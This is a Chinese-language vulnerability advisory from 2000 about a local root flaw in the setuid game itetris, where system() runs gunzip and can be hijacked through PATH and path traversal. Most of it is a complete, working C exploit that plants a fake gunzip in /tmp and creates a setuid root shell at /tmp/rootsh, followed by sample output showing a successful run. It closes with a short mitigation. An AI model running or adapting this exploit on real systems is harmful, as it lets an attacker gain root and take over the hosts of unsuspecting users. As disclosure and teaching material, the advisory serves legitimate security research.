安全研究

安全漏洞
Itetris 执行外部命令缺陷

发布日期:2000-12-22
更新日期:2000-12-22

受影响系统:

    Michael Glickman itetris 1.6.2
    Michael Glickman itetris 1.6.1
描述:

Itetris 即 Intelligent Tetris ,是一种Linux系统下的猜谜游戏。为了普通用户
能够直接访问视频硬件,该游戏是setuid-to-root了的。不幸的是,在解压字体文件
的时候,Itetris调用了system()函数去执行gunzip。这是一个古老的安全缺陷,攻
击者利用PATH环境变量、IFS等手段可以轻易获取root权限:

PATH=/tmp/hacker:$PATH

<* 来源:Chris Sharp (v9@fakehalo.org) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


/* (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org].  this will
   give you root on systems that have the itetris game installed.  the program
   is installed setuid(0)/root due to svgalib.  this exploits a system() call
   mixed with bad ../ protection, which makes this possible -- considering it
   needs a font file to end with ".gz" to run gunzip.

   explaination(egafont.c):
   
---------------------------------------------------------------------------
   [199/360]:char *FontPath, *FontPath1;
   ...
   [237/360]:unzipped = strcasecmp(FontPath+fontheight-3, ".gz");
   ...
   [246/360]:sprintf(FontPath1, "gunzip -c %s > %s", FontPath, tmp_file_name);
   [247/360]:system(FontPath1);
   
---------------------------------------------------------------------------
   
   example:
   
---------------------------------------------------------------------------
   # cc xitetris.c -o xitetris  
   # ./xitetris
   [ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org]. ]
   [*] checking /usr/local/bin/itetris for proper file permissions.
   [*] done, /usr/local/bin/itetris appears to be setuid.
   [*] done, making temporary files.
   [*] done, setting up environment variable(s).
   [*] done, launching /usr/local/bin/itetris. (the screen may blink locally)
   [*] done, cleaning up temporary files.
   [*] done, checking /tmp/rootsh for proper file permissions.
   [*] success! /tmp/rootsh appears to be set*id.
   [?] do you wish to enter the rootshell now(y/n)?: y
   [*] ok, executing rootshell(/tmp/rootsh) now.
   #
   
---------------------------------------------------------------------------
*/
#define PATH            "/usr/local/bin/itetris"        // path to
itetris.
#define APPENDPATH      "/tmp"                          // tmp dir to use.
#define EXECFILE        "gunzip"                        // don't change
this.
#define FAKEFILE        "xitetris.gz"                   // must end with
gz.
#define SUIDSHELL       "/tmp/rootsh"                   // root shell
location.
#include <stdio.h>
#include <sys/stat.h>
main(){
char cmd[256],tmpfile[256],fakefile[256],path[1024],input[0];
struct stat mod1,mod2;
FILE *suidexec,*fakegz;
fprintf(stderr,"[ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.o"
"rg]. ]\n");
fprintf(stderr,"[*] checking %s for proper file permissions.\n",PATH);
if(stat(PATH,&mod1)){
  fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
  exit(1);
}
else if(mod1.st_mode==35309){
  fprintf(stderr,"[*] done, %s appears to be setuid.\n",PATH);
}
else{
  fprintf(stderr,"[!] failed, %s doesn't appear to be setuid.\n",PATH);
  exit(1);
}
fprintf(stderr,"[*] done, making temporary files.\n");
snprintf(fakefile,sizeof(fakefile),"%s/%s",APPENDPATH,FAKEFILE);
snprintf(tmpfile,sizeof(tmpfile),"%s/%s",APPENDPATH,EXECFILE);
unlink(fakefile);fakegz=fopen(fakefile,"w");fclose(fakegz);
unlink(tmpfile);suidexec=fopen(tmpfile,"w");
fprintf(suidexec,"#!/bin/sh\n");
fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
fprintf(suidexec,"chown 0.0 %s\n",SUIDSHELL);
fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
fclose(suidexec);
chmod(tmpfile,33261);
fprintf(stderr,"[*] done, setting up environment variable(s).\n");
snprintf(path,sizeof(path),"%s:%s",APPENDPATH,getenv("PATH"));
setenv("PATH",path,1);
fprintf(stderr,"[*] done, launching %s. (the screen may blink
locally)\n",
PATH);
sleep(1);
snprintf(cmd,sizeof(cmd),"%s -VE -F../../../../%s/%s 1>/dev/null
2>&1",PATH,
APPENDPATH,FAKEFILE);
system(cmd);
fprintf(stderr,"[*] done, cleaning up temporary files.\n");
unlink(fakefile);unlink(tmpfile);
fprintf(stderr,"[*] done, checking %s for proper file permissions.\n",
SUIDSHELL);
if(stat(SUIDSHELL,&mod2)){
  fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",SUIDSHELL);
  exit(1);
}
else if(mod2.st_mode==36333){
  fprintf(stderr,"[*] success! %s appears to be set*id.\n",SUIDSHELL);
}
else{
  fprintf(stderr,"[!] failed, %s doesn't appear to be
set*id.\n",SUIDSHELL);
  exit(1);
}
fprintf(stderr,"[?] do you wish to enter the rootshell now(y/n)?: ");
scanf("%s",input);
if(input[0]!=0x59&&input[0]!=0x79){
  printf("[*] aborted, the rootshell is: %s.\n",SUIDSHELL);
}
else{
  printf("[*] ok, executing rootshell(%s) now.\n",SUIDSHELL);
  execl(SUIDSHELL,SUIDSHELL,0);
}
fprintf(stderr,"[*] exiting program successfully.\n");
exit(0);
}

建议:

临时解决方案:

NSFOCUS建议您暂时去掉 itetris 的 setuid-to-root 属性。

浏览次数:4040
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障